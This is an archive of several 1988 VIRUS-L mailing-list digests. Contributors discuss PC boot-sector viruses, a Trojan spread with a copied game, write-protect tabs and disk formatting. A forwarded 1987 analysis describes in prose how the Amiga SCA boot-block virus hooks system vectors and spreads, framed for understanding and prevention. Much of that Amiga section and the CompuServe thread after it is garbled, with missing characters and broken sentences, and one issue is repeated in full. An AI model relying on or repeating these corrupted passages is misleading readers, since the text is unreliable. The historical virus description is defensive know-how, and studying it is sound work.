  6143. So there are basically two scenarios:
  6144. 1: the OS always loads and executes whatever is on the boot block; in
  6145.    this case, the formatter must always put a program in the boot
  6146.    block, or the computer would hang.
  6147. 2: the OS checks what's on the boot block and then loads and executes
  6148.    it if there's something there.
  6149.  
  6150. In scenario 1 virus infection is pretty easy; in scenario 2, it requires
  6151. a more sophisticated virus.  Does anyone know which is the actual case
  6152. (or if I've missed something)?  Someone with a Technical Reference?
  6153.  
  6154. A corollary of scenario 2 is that if such a virus does not exist, there
  6155. is no danger in a virus inhabiting "bad" sectors of an unbootable,
  6156. source-only disk.
  6157.  
  6158. Some people have talked about doing low-level formats of their hard
  6159. disks in order to kill a virus.  I'm curious as to what ye believe the
  6160. difference is as far as virus infection is concerned.  Does a
  6161. bad-sector virus have some method of linking its lost segments back
  6162. into a file?  Whenever a new FAT is created, no file will ever use
  6163. those bad sectors unless a virus links them up again.  If the sectors
  6164. are recovered, their contents will be irrelevant.  Even if the
  6165. contents remain in an execut- able file, through a very unusual
  6166. procedure involving a copy program that opens its output file
  6167. read-write, the virus code will no longer be part of the code segment
  6168. of the executable.  And I don't think any such copy program exists
  6169. anyway.
  6170.  
  6171. So what is the thing with a low-level format that will destroy a virus
  6172. when a normal format won't?
  6173.  
  6174. - - Jeff Ogata
  6175.  
  6176. ------------------------------
  6177.  
  6178. Date: 21 December 1988, 18:50:18 CET
  6179. From: Thomas Zielke             0441/798-3109        113355   at DOLUNI1
  6180. Subject: Problems with commercial software (PC)
  6181.  
  6182. We have recently heard from people having trouble formatting disks
  6183. on their MS-DOS-PCs. In fact their computers did not allow formatting,
  6184. reading or writing diskettes of any type. Some also reported that
  6185. some files or programmes residing on the harddisk were damaged or even
  6186. destroyed.
  6187. We have already found out that only those who had a copy of a game
  6188. called 'Leisure Suit Larry' installed on their disk were affected.
  6189. Actually, this game was to be found on some PCs at our Computer Center,
  6190. and the people in question 'just made a copy' of it.
  6191. Our problem now is: How can we get rid of that virus (at least, we
  6192. believe it to be one)? Has anybody heard of it and can help us
  6193. to solve our problem? I would be most glad to get some mail...
  6194.  
  6195. Yours truly
  6196.             Thomas Zielke (113355 at DOLUNI1)
  6197.  
  6198. - - we never ask for a wonder - we simply produce one -
  6199.  
  6200. ------------------------------
  6201.  
  6202. End of VIRUS-L Digest
  6203. *********************
  6204.  
  6205. VIRUS-L Digest             Thursday, 22 Dec 1988        Volume 1 : Issue 57
  6206.  
  6207. Today's Topics:
  6208. Dirty Dozen
  6209. Boot Sectors on IBM disks (PC)
  6210. Leisure Suit Larry 'virus' (PC)
  6211. BRAIN in the USSR (PC)
  6212. Re: Write Protect Gritch & You can't fool the... (PC)
  6213. Call for papers - 12th National Computer Security Conference
  6214. Amiga virus could survive warm boot
  6215.  
  6216. ---------------------------------------------------------------------------
  6217.  
  6218. Date: Wed, 21 Dec 88 14:30:42 -0800
  6219. From: Steve Clancy <SLCLANCY@UCI.BITNET>
  6220. Subject: Dirty Dozen
  6221.  
  6222. Re: J.D. Abolins comment about beggining another Dirty Dozen list:
  6223.  
  6224. I was also quite a fan of the list, and have lost track of Eric
  6225. Newhouse.  Apparently he has dropped out of sight??  I would be most
  6226. willing to help work on such a list.  I have been collecting some
  6227. "badware" which mostly fall into the category of pirated software,
  6228. hacked software, or a very few legitamate trojan horses.  No viruses,
  6229. though.  I agreee that a more comprehensive, and perhaps broader
  6230. scoped list is needed.  And something that carries some authority with
  6231. it(???).  The Dirty Dozen tended to be circulated mostly around BBSes,
  6232. and microcomputer users, rather than in the corporate environment.
  6233.  
  6234. If anyone else, is interested in making efforts in this direction,
  6235. speak up, and perhaps we can put something together.
  6236.  
  6237. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  6238. |   Steve Clancy                      |  WELLSPRING RBBS            |
  6239. |   Biomedical Library                |  714-856-7996  24 HRS       |
  6240. |   P.O. Box 19556                    |  300-9600 N,8,1             |
  6241. |   University of California, Irvine  |  714-856-5087  nites/wkends |
  6242. |   Irvine, CA  92713                 |  300-1200 N,8,1             |
  6243. |                                     |                             |
  6244. |   SLCLANCY@UCI                      |  "Are we having fun yet?"   |
  6245. |   SLCLANCY@ORION.CF.UCI.EDU         |                             |
  6246. |                                     |                             |
  6247. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  6248.  
  6249. ------------------------------
  6250.  
  6251. Date:         Wed, 21 Dec 88 18:19:21 EST
  6252. From:         Steve <XRAYSROK@SBCCVM.BITNET>
  6253. Subject:      Boot Sectors on IBM disks (PC)
  6254.  
  6255.    Regarding BOOT sectors and some of Homer Smith's questions:
  6256.  
  6257.    As Joe Simpson points out, all disks have a boot sector on them.
  6258. It is important to understand the functionality of the boot sector.
  6259. When you power up the computer, it immediately loads some instructions
  6260. from ROM and runs them.  Among other things (like doing some
  6261. self-checks), these instructions for example tell the computer to try
  6262. to read disk drive A: (depending upon your configuration of course).
  6263. If there is a formatted diskette present, then it loads the boot
  6264. sector and does *whatever* the boot sector tells it to, even if it's a
  6265. non-system diskette.
  6266.  
  6267.    All MSDOS-formatted disks have a boot sector containing
  6268. instructions, regardless of whether or not the diskette was formatted
  6269. with the system option (doubters, go look at the boot sector on a
  6270. non-bootable disk).  In fact, the boot sectors of system and
  6271. non-system diskettes are identical.  The difference between system and
  6272. non-system disks *for* *the* *IBM* *PC* is not in the boot sector, but
  6273. in the presence or absence of system files on the disk (that's easy to
  6274. check: just format a disk *without* the system option and then copy
  6275. the system files onto the disk and see if it works [Assuming that
  6276. you're running MSDOS, these files are ibmbio.com, ibmdos.com, and
  6277. command.com, the first two of which are *hidden*.].  It does.  Either
  6278. that or examine the boot sector bit for bit).  All the system option
  6279. does is tell the machine to copy these three files after formatting.
  6280. The directory, FAT, and sectoring get setup during the format (with
  6281. erasure of anything that may have been on the disk before formatting).
  6282.  
  6283.    The instructions found on the boot sector normally tell the
  6284. computer to go find certain system files on the disk, load them into
  6285. memory, and run them.  This is how DOS gets going.  If the system
  6286. files are not found, then an error message like "Non-system disk or
  6287. disk error Replace and strike any key when ready" is displayed and the
  6288. computer waits for you to respond.
  6289.  
  6290.    It should be clear that it would be very easy for a virus to put
  6291. instructions in the boot sector (regardless of what option was used
  6292. when formatting the disk) telling the computer (when booted) to go
  6293. find some virus file on the disk, load it into memory, and then go
  6294. back and excute the real boot sector (which was moved by the virus to
  6295. some other part of the disk), leaving many users none the wiser.  Even
  6296. if it's a non-system diskette, the computer doesn't know that (upon
  6297. booting) until it loads the boot sector and executes it and doesn't
  6298. find any system files (but if there is a boot virus present, the virus
  6299. gets run first before the "Non-system disk ..." message gets
  6300. displayed).  This is true regardless of whether the disk even has any
  6301. files on it.  A large virus may not be able to fit entirely in the
  6302. boot sector, but that's no problem; it can store instructions in good
  6303. sectors which it labels as "bad" (so that DOS won't overwrite them),
  6304. or in hidden files (which could be discovered).
  6305.  
  6306.    It should also be pointed out (as I'm sure it has been many times
  6307. on this list) that utilities such as DIR or FORMAT are programs and
  6308. can be infected with a virus (so just doing a DIR can infect any disks
  6309. you happen to have in any of your drives at that time).
  6310.  
  6311.    It would be a good idea to think about all this in the context of
  6312. real, known viruses, so I'm hoping somebody will be able to put
  6313. together a compilation of discriptions of all known viruses, variants,
  6314. and their characteristics.
  6315.  
  6316. Something about write tabs: We have a genuine 6MHz IBM PC AT which I
  6317. have discovered can write to the disk *if* the write tab is
  6318. transparent.
  6319.  
  6320. Steven C. Woronick      |  Disclaimer: These are my own opinions/ideas.
  6321. Physics Dept.           |        Always check things out for yourself...
  6322. SUNY at Stony Brook, NY |
  6323. Acknowledge-To: <XRAYSROK@SBCCVM>
  6324.  
  6325. ------------------------------
  6326.  
  6327. Date: Wed, 21-Dec-88 19:26:29 PST
  6328. From: portal!cup.portal.com!dan-hankins@Sun.COM
  6329. Subject: Leisure Suit Larry 'virus' (PC)
  6330.  
  6331.      There was some discussion of this on the network where I work.
  6332. The consensus was that it is a Trojan, not a virus; it gets loaded
  6333. into memory when LSL is run, then remains and destroys things, but
  6334. does not copy itself to other programs, not even other copies of LSL.
  6335.  
  6336. Dan Hankins
  6337.  
  6338. ------------------------------
  6339.  
  6340. Date:     Wed, 21 Dec 88 21:53:34 PST
  6341. From:     Robert Slade <USERCE57@UBCMTSG.BITNET>
  6342. Subject:  BRAIN in the USSR (PC)
  6343.  
  6344.      No one has cross posted it yet, but RISKS 7.96 has an article
  6345. about virus infection in the USSR.  They have, of course, developed
  6346. the ultimate anti virus program, the details of which remain a state
  6347. secret ...
  6348.  
  6349.      Also, 7.97 reports on an article which implies that virus
  6350. infections are one-in-a-million.
  6351.  
  6352. ------------------------------
  6353.  
  6354. Date:         Wed, 21 Dec 88 17:47:57 EST
  6355. From:         "Christian J. Haller" <CJH@CORNELLA.ccs.cornell.edu>
  6356. Subject:      Re: Write Protect Gritch & You can't fool the... (PC)
  6357.  
  6358. >Date: Wed, 21 Dec 88 09:43:09 EST
  6359. >From: Don Alvarez <boomer@space.mit.edu>
  6360. >Subject: Write Protect Gritch
  6361. >    ...
  6362. >    I know Ken doesn't like people flaming on the list, so maybe I'll
  6363. >    get booted for saying this, but PLEASE, if somebody asks a question
  6364. >    which has a simple, yes or no answer, and you want to respond with
  6365. >    an nth generation rumor of unknown origin, keep it short...
  6366.  
  6367. I did my homework before I wrote my opinion.  I already knew about the
  6368. documented BIOS interrupt limitations.  There are undocumented BIOS
  6369. calls, and there are non-BIOS hardware calls.
  6370.  
  6371. When the PC was a baby, one or two software vendors (obscure ones) had
  6372. a copy protection scheme that involved writing something to their own
  6373. diskettes, whether write protected or not, on the user's machine.
  6374. Sorry, I don't remember the package.  Somebody noticed this and asked
  6375. IBM about it.  Of course it wasn't documented.  It wasn't DOS or BIOS.
  6376. The answer was no, it couldn't be done, but the fact remained that it
  6377. was being done, and eventually, informally, not for attribution, quietly,
  6378. those who were asking got word that it could be done, in software.
  6379. The technique was not part of the answer.  I have no proof.  It may
  6380. have been an undocumented feature of the early diskette drives, long
  6381. ago de-featured.  I don't know.  But the facts of the case seemed clear
  6382. at the time, and that was the basis for my position that write protect
  6383. tabs are not certain protection on a PC.
  6384.  
  6385. >Date: Wed, 21 Dec 88 11:40 EST
  6386. >From: X-=*REB*=-X <KREBAUM@VAX1.CC.LEHIGH.EDU>
  6387. >Subject: You can't fool the write protect line w/software (PC)
  6388. >
  6389. >According to the  circut diagram  from IBM for  IBM  5.25"  diskette
  6390. >drives...
  6391. >  . . .       Thus, all the talk recently of this
  6392. >being controlled by software is incorrect.
  6393. >
  6394. >Richard Baum & John Hunt
  6395. >[Ed. Thanks guys!  The only possible weak link then would be a
  6396. >malfunctioning write-protect sensor (normally an optic sensor, I
  6397. >believe).
  6398.  
  6399. Nope, it's mechanical in IBM PC's.
  6400. Yes, thanks guys.  I do appreciate the research.  I am almost but not
  6401. quite convinced that the unattributable IBM source I mentioned above
  6402. was wrong, or that newer drives are indeed absolutely hardware protected.
  6403. The only remaining loopholes are in Len Levine's not-yet-conclusive
  6404. research (see his V1 #54 contribution) that disk controller ROM is loaded
  6405. into RAM at boot time.  You could tweak it as you liked, then!  You could
  6406. prevent it from being reloaded, you could change the logic states.
  6407. In short, you could lie to the disk controller about the write protect
  6408. status.  It is possible that the hardware protection is absolute, but
  6409. I agree with Len Levine that the question is still open, and I for one
  6410. would never trust an IBM Tech Ref manual to tell the whole story.  I've
  6411. been living with those suckers for about seven years, and they get less
  6412. informative every year.
  6413.  
  6414. - -Chris Haller
  6415. Acknowledge-To: <CJH@CORNELLA>
  6416.  
  6417. ------------------------------
  6418.  
  6419. Date:  Wed, 21 Dec 88 23:15 EST
  6420. From: Jack Holleran <Holleran@DOCKMASTER.ARPA>
  6421. Subject:  Call for papers - 12th National Computer Security Conference
  6422.  
  6423. ************************************************************************
  6424. *                     CALL  FOR  PAPERS                                *
  6425. ************************************************************************
  6426.  
  6427.                            12th
  6428.           NATIONAL  COMPUTER  SECURITY  CONFERENCE
  6429.     Sponsored by the National Computer Security Center and
  6430.       the National Institute of Standards and Technology
  6431.  
  6432.               Information Systems Security:
  6433.        Solutions for Today - Concepts for Tomorrow
  6434.  
  6435.                    10-13 OCTOBER 1989
  6436.               BALTIMORE  CONVENTION  CENTER
  6437.                   BALTIMORE,  MARYLAND
  6438.  
  6439. This conference provides a forum for the Government and the private sector
  6440. to share information on technologies, present and future, that are designed
  6441. to meet the ever-growing challenge of telecommunications and automated
  6442. information systems security .  The conference will offer multiple tracks
  6443. for the needs of users, vendors, and the research and development
  6444. communities.  The focus of the conference will be on:  Systems Application
  6445. Guidance,  Security Education and Training, Evaluation and Certification,
  6446. Innovations and New Products, Management and Administration, and Disaster
  6447. Prevention and Recovery.  We encourage submission of papers on the following
  6448. topics of high interest:
  6449.  
  6450. Systems Application Guidance         Innovations and New Products
  6451.    - Access Control Strategies         - Approved/Endorsed Products
  6452.    - Achieving Network Security        - Audit Reduction Tools and Techniques
  6453.    - Building on Trusted Computing     - Biometric Authentication
  6454.       Bases                            - Data Base Security
  6455.    - Integrating INFOSEC into Systems  - Personal Identification and
  6456.    - Securing Heterogeneous Networks      Authentication
  6457.    - Secure Architectures              - Smart Card Applications
  6458.    - Small Systems Security            - Tools and Technology
  6459.  
  6460. Disaster Prevention and Recovery     Management and Administration
  6461.    - Assurance of Service              - Accrediting Information Systems
  6462.    - Computer Viruses                     and Networks
  6463.    - Contingency Planning              - Defining and Specifying Computer
  6464.    - Disaster Recovery                    Security Requirements
  6465.    - Malicious Code                    - Ethics and Social Issues
  6466.    - Survivability                     - Life Cycle Management
  6467.    - Managing Risk                     - Role of Standards
  6468.  
  6469. Evaluation and Certification         Security Education and Training
  6470. - - Assurance and Analytic Techniques    - Building Security Awareness
  6471. - - Covert Channel Analysis              - Keeping Security In Step With
  6472. - - Conducting Security Evaluations         Technology
  6473. - - Experiences in Applying              - Policies, Standards, and Guidelines
  6474.    Verification Techniques             - Preparing Security Plans
  6475. - - Formal Policy Models
  6476. - - Understanding the Threat
  6477.  
  6478.  
  6479. BY FEBRUARY 17, 1989: Send five copies of your draft paper* to one of the
  6480.                       following addresses.  Include the topical category of
  6481.                       your paper, author('s) name, address, and telephone
  6482.                       number on the cover sheet only.
  6483.  
  6484.  1.  FOR PAPERS SENT VIA   Computer Security Conference
  6485.      U.S. MAIL ONLY:       ATTN:  Carolyn Copsey, C2
  6486.                            National Computer Security Center
  6487.                            Fort George G. Meade, MD 20755-6000
  6488.  
  6489.  2.  FOR PAPERS SENT VIA   Computer Security Conference
  6490.      COURIER SERVICES      c/o Carolyn Copsey, ATTN:  C2
  6491.      (FEDERAL EXPRESS,     National Computer Security Center
  6492.      OVERNIGHT EXPRESS,    911 Elkridge Landing Road
  6493.      EMERY, UPS, etc.):    Linthicum, MD  21090
  6494.  
  6495.  
  6496.  3.  VIA E-MAIL:           NCSC12@DOCKMASTER.ARPA   (1 copy only)
  6497.  
  6498.  
  6499. BY MAY 12, 1989:   Speakers selected to participate in the conference will be
  6500.                    notified.
  6501.  
  6502. BY JUNE 30, 1989:  Final, camera-ready papers are due.
  6503.  
  6504.  
  6505. * Government employees or those under Government sponsorship must so
  6506.    identify their papers.
  6507.  
  6508. For additional information, please call Carolyn Copsey at (301) 859-4466.
  6509. Queries may also be sent to NCSC12@DOCKMASTER.ARPA via e-mail.
  6510.  
  6511. ------------------------------
  6512.  
  6513. Date: Wed, 21 Dec 88 14:15:38 -0800
  6514. From: Steve Clancy <SLCLANCY@UCI.BITNET>
  6515. Subject: Amiga virus could survive warm boot
  6516.  
  6517. After reading the discussions regarding viruses that can support a
  6518. warm boot, I remembered some material I had seen a few months ago
  6519. regarding Amiga microcomputer viruses that did the same thing.  Here
  6520. are some of the messages from back then that were gleaned from
  6521. compuserve and Amiga BBSes.
  6522.  
  6523.  
  6524.  Article 10437 of 10516, Fri 11:32.
  6525.  Subject: Amiga VIRUS
  6526.  From: bill@cbmvax.UUCP (Bill Koester CATS)
  6527.  Date: 13 Nov 87 19:32:05 GMT
  6528.  
  6529.          THE AMIGA VIRUS - Bill Koester (CATS)
  6530.  
  6531. When I first got a copy of the Amiga VIRUS I was interested to
  6532. see how such a program worked. I dissassembled the code to a disk
  6533. file and hand commented it. This article will try to pass on some
  6534. of the things I have learned through my efforts.
  6535.  
  6536.                   1) Definition.
  6537.                   2) Dangers.
  6538.                   3) Mechanics
  6539.                   4) Prevention
  6540.  
  6541. 1. - Definition.
  6542. - ----------------
  6543.  
  6544. The Amiga VIRUS is simply a modification of the boot block of an
  6545. existing DOS boot disk. Any disk that can be used to boot the
  6546. Amiga (ie workbench) has a reserved area called the boot block.
  6547. On an Amiga floppy the bootblock consists of the first two
  6548. sectors on the disk. Each sector is 512 bytes long so the boot
  6549. block contains 1024 bytes. When KickStart is bringing up the
  6550. system the disk in drive 0 is checked to see if it is a valid DOS
  6551. boot disk. If it is, the first two sectors on the disk are loaded
  6552. into memory and executed. The boot block normally contains a
  6553. small bit of code that loads and initializes the DOS. If not for
  6554. this BOOT CODE you would never see the initial CLI. The normal
  6555. BOOT CODE is very small and does nothing but call the DOS
  6556. initialization. Therefore, on a normal DOS boot disk there is
  6557. plenty of room left unused in the BOOT BLOCK.
  6558.  
  6559. The VIRUS is a replacement for the normal DOS BOOT CODE. In
  6560. addition to performing the normal DOS startup the VIRUS contains
  6561. code for displaying the VIRUS message and infecting other disks.
  6562. Once the machine is booted from an infected disk the VIRUS
  6563. remains in memory even after a warm start. Once the VIRUS is
  6564. memory resident the warm start routine is affected, instead of
  6565. going through the normal startup the VIRUS checks the boot disk
  6566. in drive 0 for itself. If the VIRUS in memory sees that the boot
  6567. block is not infected it copies itself into the boot block
  6568. overwriting any code that was there before. It is in this manner
  6569. that the VIRUS propagates from one disk to another. After a
  6570. certain number of disks have been infected the VIRUS will print a
  6571. message telling you that Something wonderful has happened.
  6572.  
  6573.  
  6574. 2. - Dangers.
  6575. - -------------
  6576.  
  6577. When the VIRUS infects a disk the existing boot block is
  6578. overwritten. Since some commercial software packages and
  6579. especially games store special information in the boot block the
  6580. VIRUS could damage these disks. When the boot block is written
  6581. with the VIRUS, any special information is lost forever. If it
  6582. was your only copy of the game then you are out of luck and
  6583. probably quite angry!!
  6584.  
  6585. 3. - Mechanics.
  6586. - ---------------
  6587.  
  6588. Here is a more detailed description of what the virus does. This
  6589. is intended to be used for learning and understanding ONLY!! It
  6590. is not the authors intention that this description be used to
  6591. create any new strains of the VIRUS. What may have once been an
  6592. innocent hack has turned into a destructive pain in the #$@ for
  6593. many people. Lets not make it any worse!!
  6594.  
  6595.    a.)   Infiltration.
  6596.  
  6597. This is the first stage of viral infection. The machine is
  6598. brought up normally by reading the boot block into memory. When
  6599. control is transferred to the boot block code, the virus code
  6600. immediately copies the entire boot block to $7EC00, it then JSR's
  6601. to the copied code to wedge into the CoolCapture vector. Once
  6602. wedged in, control returns to the loaded boot block which
  6603. performs the normal dos i the system.
  6604.  
  6605.    b.)   Hiding Out.
  6606.  
  6607. At this point the syem CoolCapture vector has been replaced and
  6608. points to code thin the virus. When control is routed through
  6609. the CoolCapte vector the virus first checks for the left mouse
  6610. button,  it is down the virus clears the CoolCapture wedge and
  6611. retuns to the system. If the left mouse button is not pressed
  6612. t virus replaces the DoIO code with its own version of DoIO a
  6613. returns to the system.
  6614.  
  6615.    c.)   Spreading.
  6616.  
  6617. The code far has been concerned only with making sure that at
  6618. any gin time the DoIO vector points to virus code. This is
  6619. where e real action takes place. On every call to DoIO the
  6620. virus hecks the io_Length field of the IOB if this length is
  6621. equato 1024 bytes then it could possibly be a request to read
  6622. t in the strap code and this is a boot
  6623. block read request. Inot installed. If we
  6624. are reading the boot block we JSR to te old DoIO code to read
  6625. the boot block and then control retrns to us. After reading, the
  6626. checksum for the virus boot bk is
  6627. already infected so just return. If they are not equala counter
  6628. is incremented and the copy of the virus at $7EC0is written to
  6629. the boot block on the disk. If the counter ANed with $F is equal
  6630. to 0 then a rastport and bitmap are conected by a VIRUS >
  6631. < Another masterpiece of the Mega-MightySCA >
  6632.  
  6633. 4. - Prevention.
  6634. - ----------------
  6635.  
  6636. How do you otect yourself from the virus?
  6637.  
  6638. 1) Never warm start the machine, always power down first. (works
  6639. but not to practical!)
  6640.  
  6641. 2) Always hold down the left mouse button when rebooting. (Also
  6642. works, but only because the VIRUS code checks for
  6643.                                                  3) Obtain a copy of VCheck1.1 d
  6644. into the public domain. VCheck.1 was posted to usnet and will
  6645. also be posted to BIX. ( Jut like the real thing the best course
  6646. of action is educatio and prevention!)
  6647.  
  6648. - ----
  6649. AMIGA ZONE       Sec: 2
  6650. Theme:WARNING!!  AMIGA VIRUS ON THE
  6651. To:    BEARDLOVER      By:  BARDLOVER
  6652. Date:  10/09/87  3:42  Num: 16,622
  6653. Title: R#16606HERE'S THE INFO!
  6654. - ----
  6655.  
  6656. Received: by MAINE (Mailer X1.24iscussion" <CSNEWS@MAINE>
  6657. To:       7GMADISO@POMONA
  6658. Date:    Tue, 6 Oct 1987 10:42 EDT
  6659.  
  6660.  
  6661. From: SLCLANCY@UCI
  6662. Newsgrups: comp.sys.amiga
  6663. Subject: IMPORTANT WARNING ... Amiga Vius Loose ... PLEASE READ
  6664. Message-ID: <15589@amdahl.amdahl.com>
  6665. Date: 4 Oct 87 13:24:48 GMT
  6666. Organization: Amdahl Corporation,  Sunnyvale, CA 94086
  6667. Lines: 190
  6668. Keywords: virus trojan worm program infected disk
  6669.  
  6670. [ Some days you eat the lke we've been spared such crap until now, but this higg
  6671. notice shows we are not immune to attacks on our machines by the "Dark Side
  6672. of the Force"!
  6673.  
  6674. Any further inforation on this (or other such nastiness) would be greatly
  6675. appreciated!
  6676.  
  6677. Doc, if you are reading this, *please* post the Sectorama program that I
  6678. emailed you several weeks ago ASAP!
  6679.  
  6680. /kim
  6681.  
  6682.  
  6683.  
  6684. The following is a thread from Compuserve:
  6685.  
  6686. =========================================================================
  6687.  
  6688. #: 87294 S3/Hot News & Rumors
  6689.     02-ct-87  02:41:08
  6690. Sb: #WARNING! Virus loose!
  6691. Fm: Larry Phillre are a variety of programs
  6692. that are variously known as Trjan Horses, Bombs, and Viruses. While Bombs
  6693. are generally destructive (as evidenced by their name), and Trojan Horses
  6694. re either destructive or for the purpose of theft of data, Viruses have
  6695. been known to be benign or malignant both. A Vive it may or may not be, it will 
  6696.                                                                                n
  6697. infected disk. All works normally, with no sign tt the machine with the CTRL-Amn
  6698. uninfeted disk, the virus is transferred to the boot disk, and it oo
  6699. becomes a "carrier", ready to pass it on, and so on.
  6700.  
  6701. The presence of the virus can be detected by looking at block 1 on a disk.
  6702. Normally, this will have random data or a pattern of data in it, but you
  6703. will be able to see the virus tor 1). If the virus is present, run INSTALL on tL
  6704. will rewrite sectors 0 and 1, killing the virus. Then's power. If you have bootn
  6705. infected disk, and havect the disk.
  6706.  
  6707. There have been a couple of reports of a mewas trashed by the virus. The messag:
  6708. "Something wondesame message that appears in block 1 of an infected disk.
  6709.  
  6710. Watch for it... stomp it out.
  6711.  
  6712. Regards, Larry.
  6713.  
  6714.  
  6715. #: 87306 S3/Hot News & Rumors
  6716.     02-Oct-87  04:43:21
  6717. Sb: #8729ni 73260,1413
  6718. To: Larry Phillips/SYSOP 76703,4322 (X)
  6719.  
  6720. Lart, but I thought that re-booting the
  6721. system was supposed tirus be
  6722. transmited?
  6723.  
  6724.      Also, should someone without the ability to look at a disk in the way
  6725. you suggested run across this message will a cold reboot solve the problem
  6726. (so gain)? Will initalizing an
  6727. "infected" disk (after a cold boot) remove the infection? (along with anything
  6728. else on the u think that this message is important enough
  6729. to go at the head of the forum-so that you see it when you enter the foruot onlo
  6730. aTRL-Amiga-Amiga). The virus
  6731. itself is contained in the "boohen you reboot with an
  6732. uninfected disk, the virus writes it infecting it as well.
  6733.  
  6734.   A cold reboot (power off, power on) will indeed remove it from the
  6735. memory. The problem is, is infected before you would think to go through
  6736. this procedure.
  6737.  
  6738.   As for looking at the disk to determine if the virus is there, the
  6739. program to use is "Sectorama", which is in DL 9 as SEC.ARC. Perhaps
  6740. someone will come up with a program that will detect and kill the virus,
  6741. giving you a warning at the same time.
  6742.  
  6743.   I do think it's important, and we will probably put it into one of the
  6744. Data Libraries and mention it in the short bulletin which everyone will
  6745. see upon entry to the forum.
  6746.  
  6747. Regards, Larry.
  6748.  
  6749.  
  6750. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  6751. |   Steve Clancy                      |  WELLSPRING RBBS            |
  6752. |   Biomedical Library                |  714-856-7996  24 HRS       |
  6753. |   P.O. Box 19556                    |  300-9600 N,8,1             |
  6754. |   University of California, Irvine  |  714-856-5087  nites/wkends |
  6755. |   Irvine, CA  92713                 |  300-1200 N,8,1             |
  6756. |                                     |                             |
  6757. |   SLCLANCY@UCI                      |  "Are we having fun yet?"   |
  6758. |   SLCLANCY@ORION.CF.UCI.EDU         |         -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  6759. --------------------------virus-l
  6760.  
  6761.  
  6762. VIRUS-L Digest             Thursday, 22 Dec 1988        Volume 1 : Issue 58
  6763.  
  6764. Today's Topics:
  6765. Brain surviving warm boot (PC)
  6766. RE: FORMAT command (PC)
  6767.  
  6768. ---------------------------------------------------------------------------
  6769.  
  6770. Date:         Thu, 22 Dec 88 8:50 EST
  6771. From:         Don Kazem <DKAZEM@NAS.BITNET>
  6772. Subject:      Brain surviving warm boot (PC)
  6773.  
  6774. I first brought up this issue about the Brain Virus being able to
  6775. sustain itself even after a warm boot and it being able to write to a
  6776. write protected disk. These were my findings and I posted them to the
  6777. list. As far as I am concerned they were accurate.
  6778.  
  6779. To do away with all the flames, I have requsitioned another dual
  6780. floppy machine (the same as the one used in my first test). I will
  6781. repeat the tests that yielded such controversial results and will
  6782. post the results back to the list.  Until then please hold on to your
  6783. flames.
  6784.  
  6785.           Don Kazem
  6786.           National Academy of Sciences
  6787.           DKAZEM@NAS.BITNET
  6788.  
  6789. ------------------------------
  6790.  
  6791. Date: Thu, 22 Dec 88 09:04 MST
  6792. From: GORDON_A%CUBLDR@VAXF.COLORADO.EDU
  6793. Subject: RE: FORMAT command (PC)
  6794.  
  6795. To Homer re FORMAT...regarding your hard disk low level format, what
  6796. kind of computer did you say you have?  Did you say your computer
  6797. supported a hard- disk?
  6798.  
  6799. The DOS FORMAT command does NOT destroy data on the disk.  It wipes
  6800. out the FAT, which is kind of like the card catalog and releases all
  6801. locations so that they can be written over.  If you use NORTON
  6802. utilities or something similar, you will see on a disk that had data
  6803. on it and was FORMATted, that the items in the root directory can be
  6804. listed, only with '?' in place of the first character.  These items
  6805. can then be restored, since the directory listing also gives the 1st
  6806. sector or cluster location.  If the files are contiguous they can be
  6807. saved.  All this means that a virus residing in the data area will not
  6808. be erased, but it isn't safe either, unless other factors are
  6809. implemented.  I think that during the FORMAT, DOS will skip over areas
  6810. deemed bad during the low level format.  Presumably a virus could lock
  6811. out these sectors so that they could be used for the virus's purposes.
  6812.  
  6813. Allen
  6814.  
  6815. ------------------------------
  6816.  
  6817. End of VIRUS-L Digest
  6818. *********************VIRUS-L Digest             Thursday, 22 Dec 1988        Volume 1 : Issue 58
  6819.  
  6820. Today's Topics:
  6821. Brain surviving warm boot (PC)
  6822. RE: FORMAT command (PC)
  6823.  
  6824. ---------------------------------------------------------------------------
  6825.  
  6826. Date:         Thu, 22 Dec 88 8:50 EST
  6827. From:         Don Kazem <DKAZEM@NAS.BITNET>
  6828. Subject:      Brain surviving warm boot (PC)
  6829.  
  6830. I first brought up this issue about the Brain Virus being able to
  6831. sustain itself even after a warm boot and it being able to write to a
  6832. write protected disk. These were my findings and I posted them to the
  6833. list. As far as I am concerned they were accurate.
  6834.  
  6835. To do away with all the flames, I have requsitioned another dual
  6836. floppy machine (the same as the one used in my first test). I will
  6837. repeat the tests that yielded such controversial results and will
  6838. post the results back to the list.  Until then please hold on to your
  6839. flames.
  6840.  
  6841.           Don Kazem
  6842.           National Academy of Sciences
  6843.           DKAZEM@NAS.BITNET
  6844.  
  6845. ------------------------------
  6846.  
  6847. Date: Thu, 22 Dec 88 09:04 MST
  6848. From: GORDON_A%CUBLDR@VAXF.COLORADO.EDU
  6849. Subject: RE: FORMAT command (PC)
  6850.  
  6851. To Homer re FORMAT...regarding your hard disk low level format, what
  6852. kind of computer did you say you have?  Did you say your computer
  6853. supported a hard- disk?
  6854.  
  6855. The DOS FORMAT command does NOT destroy data on the disk.  It wipes
  6856. out the FAT, which is kind of like the card catalog and releases all
  6857. locations so that they can be written over.  If you use NORTON
  6858. utilities or something similar, you will see on a disk that had data
  6859. on it and was FORMATted, that the items in the root directory can be
  6860. listed, only with '?' in place of the first character.  These items
  6861. can then be restored, since the directory listing also gives the 1st
  6862. sector or cluster location.  If the files are contiguous they can be
  6863. saved.  All this means that a virus residing in the data area will not
  6864. be erased, but it isn't safe either, unless other factors are
  6865. implemented.  I think that during the FORMAT, DOS will skip over areas
  6866. deemed bad during the low level format.  Presumably a virus could lock
  6867. out these sectors so that they could be used for the virus's purposes.
  6868.  
  6869. Allen
  6870.  
  6871. ------------------------------
  6872.  
  6873. End of VIRUS-L Digest
  6874. *********************VIRUS-L Digest             Thursday, 29 Dec 1988        Volume 1 : Issue 59a
  6875.  
  6876. Today's Topics:
  6877. UUDECODE source available (PC?)
  6878. debrain.uue
  6879. Virus @ lockheed?
  6880. More on the virus...
  6881. nVIR 10 - A Correction (Mac)
  6882. VIRUS WARNING: DECNET Worm (forwarded from VALERT-L)
  6883. Formatting disks (PC)
  6884.  
